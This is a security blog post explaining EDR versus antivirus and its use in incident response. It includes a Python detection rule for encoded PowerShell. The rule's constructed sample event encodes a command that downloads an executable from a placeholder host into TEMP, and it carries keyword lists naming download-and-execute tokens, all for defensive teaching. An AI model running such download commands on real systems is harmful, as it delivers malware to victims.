What is EDR?
Endpoint detection and response (EDR) has been a buzzword in the world of cybersecurity for the last couple of years, but what does that really mean? EDR tools are designed to continuously monitor systems for anomalous or malicious activity. A monitoring agent runs in the background, ideally on every endpoint in the environment, and the end user experiences little to no difference in performance. When properly implemented, these tools can provide extensive insight into activity across a network, and they are often much more effective in detecting and stopping threats than traditional security tools. Other security tools can track similar adversary behavior (e.g., command and control activity, network traffic, malicious payloads) at the network level, but EDR provides greater insight into the specific actions that were performed on the endpoint where the activity is actually occurring.
But I have antivirus…
While most EDR technologies are not designed to completely replace traditional antivirus (AV), these tools go beyond AV capabilities. AV is typically designed to flag known malicious programs using signatures or heuristics, which means that it is great for identifying malware that has already been observed in the wild and included in the AV tool’s definitions (assuming the AV is up to date). However, most AV tools are not designed to identify malicious activity (e.g., privilege escalation, lateral movement, use of built-in Windows tools). With attackers becoming more sophisticated every day, there are many ways to circumvent traditional AV detection.
One example we see frequently is attackers using Base64-encoded PowerShell commands to download or propagate malware across a network. PowerShell is a trusted program, so it doesn’t trigger any AV alerts when it runs on a system. EDR, on the other hand, would see this activity as anomalous and trigger an alert. Another tactic that AV is not designed to flag is privilege escalation. Attackers on a network with legitimate credentials would not set off an AV alert, but that type of unusual activity could be flagged by an EDR tool and then reviewed by an analyst.
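The following is an added example, not code from the original post, of the kind of rule an EDR or SIEM analyst might write for the encoded-PowerShell case above: it scans constructed process-creation events, flags PowerShell launched with an -EncodedCommand style flag, decodes the base64 (PowerShell expects UTF-16LE text) so an analyst can read it, and raises severity when the parent process or decoded content is also suspicious. Event fields, the parent-process list and the keyword list are assumptions for illustration.

```python
import base64
import re
from typing import Dict, List, Optional


def _enc(cmd: str) -> str:
    """Build a -EncodedCommand argument: base64 of the UTF-16LE command text."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# Constructed process-creation events (not real telemetry); field names are assumed.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "WS01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
    {"host": "WS02", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _enc("Invoke-WebRequest -Uri http://example.invalid/p -OutFile $env:TEMP\\p.exe")},
    {"host": "SRV01", "parent": "services.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
]

# Common short forms of -EncodedCommand followed by a base64 blob.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_WINDOW = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "wscript.exe"}  # assumed list
SUSPICIOUS_TOKENS = ("invoke-webrequest", "downloadstring", "invoke-expression", "iex")  # assumed list


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode a -EncodedCommand blob; None if it is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None


def analyze_event(evt: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return an alert dict for an encoded PowerShell launch, or None if the event is not one."""
    if not evt["image"].lower().startswith(("powershell", "pwsh")):
        return None
    match = ENC_FLAG.search(evt["cmdline"])
    if not match:
        return None
    decoded = decode_encoded_command(match.group(1))
    reasons = ["encoded PowerShell command line"]
    if evt["parent"].lower() in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {evt['parent']}")
    if HIDDEN_WINDOW.search(evt["cmdline"]):
        reasons.append("hidden window requested")
    if decoded:
        reasons += [f"decoded command contains '{t}'" for t in SUSPICIOUS_TOKENS if t in decoded.lower()]
    return {"host": evt["host"], "decoded": decoded, "reasons": reasons,
            "severity": "high" if len(reasons) > 1 else "medium"}


def find_encoded_powershell(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run the rule over a batch of events and keep only the alerts."""
    return [alert for alert in map(analyze_event, events) if alert]
```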
A third common attacker technique is to disable AV tools altogether. We often see attackers uninstalling AV products during their reconnaissance phase, and many modern malware variants have built-in functionality to disable common AV products, like Windows Defender, Malwarebytes and others. It is much less common for us to see attackers searching for EDR tools to disable or uninstall. In addition, most EDR tools have built-in alerting that can be triggered if an endpoint goes offline, so if communication with the sensor is lost because an attacker disabled or removed the agent, this can be identified much more quickly.
Using EDR for Incident Response
So we’ve established that EDR can be a great security monitoring tool, but how can we use it during an active incident? There are a few ways that we are using EDR to assist our clients during active incidents with great success. First, it helps to identify infected systems and contain the incident as quickly as possible. In the past, security teams and incident responders were often left running around to manually identify and disconnect/shut down infected systems. With EDR, everything can be tracked in a single portal, and when a system shows signs of infection, we can end malicious processes and quarantine the system to prevent further spreading much faster than before. In some cases, this tactic has allowed us to catch and stop worming malware such as Emotet and Trickbot before an eventual ransomware deployment. This allows one analyst (or a small team) to direct the incident response process rather than leaving an entire team attempting to shut down various systems or terminate malicious processes. Coordination among team members is still extremely important during an incident, but EDR can help ease the burden and reduce the hours needed to effectively respond to an active threat.
We also use EDR to further our investigations during or immediately after an incident, which is especially helpful when tracking attacker movements and activity and tracing the attack back to patient zero. We are seeing a gradual progression in the incident response field from collecting full forensic images to triaging systems for key forensic artifacts. EDR tools allow us to narrow our focus even further with increased efficiency. We can quickly backtrack across a network to identify the point of origin and other attacker actions, deploying triage tools or collecting specific artifacts as necessary.
Once we have established indicators of compromise (IOCs), we are able to use EDR tools to quickly search the entire environment for similar indicators. This helps to identify additional systems of interest. We can pivot off these known IOCs to find additional related activity or processes, and this gives us greater insight into exactly how an attack was propagated across the network. It also allows us as the incident response team to work with the threat monitoring team to watch for those processes and patterns moving forward.
Finally, during the remediation process, an EDR solution can provide greater peace of mind to ensure that newly cleaned or rebuilt systems are not showing signs of infection. There are limitations to this (no security tool is 100% effective), but EDR can greatly assist in getting critical systems back up and running in a timely fashion to avoid major downtime. Of course, there is no substitute for completely wiping/rebuilding systems and restoring only clean data. Malware can hide in a multitude of places to establish persistence, and it is nearly impossible to ensure that a system is completely clean without rebuilding. In addition, the EDR monitoring agents can only track current activity and running processes on the system. If a malicious file is sitting dormant on a system, it generally won’t set off any alerts in the EDR tools, so malware could stay dormant and avoid detection for an extended period of time. This helps underscore the importance of maintaining traditional security tools, like AV, in tandem with an EDR solution.
Why it matters…
As an incident responder, these types of tools can make your job much easier. You can save time, energy and resources by quickly containing and tracking an incident, then shift your focus to remediation and investigation. As a security professional, you can use EDR to better protect your network. You and your team can detect incidents earlier, prevent them from spreading and limit the risk and exposure to your data. From a purely business perspective, the financial benefits can be significant if an incident is detected and contained quickly. This can help reduce system downtime, preserve critical data and prevent the reputational loss that comes from reporting an incident that affected third-party or customer data.
As with any security tool or control, EDR is not a silver bullet, but it can play a major role in organizational security and be a powerful asset in an incident responder’s toolkit.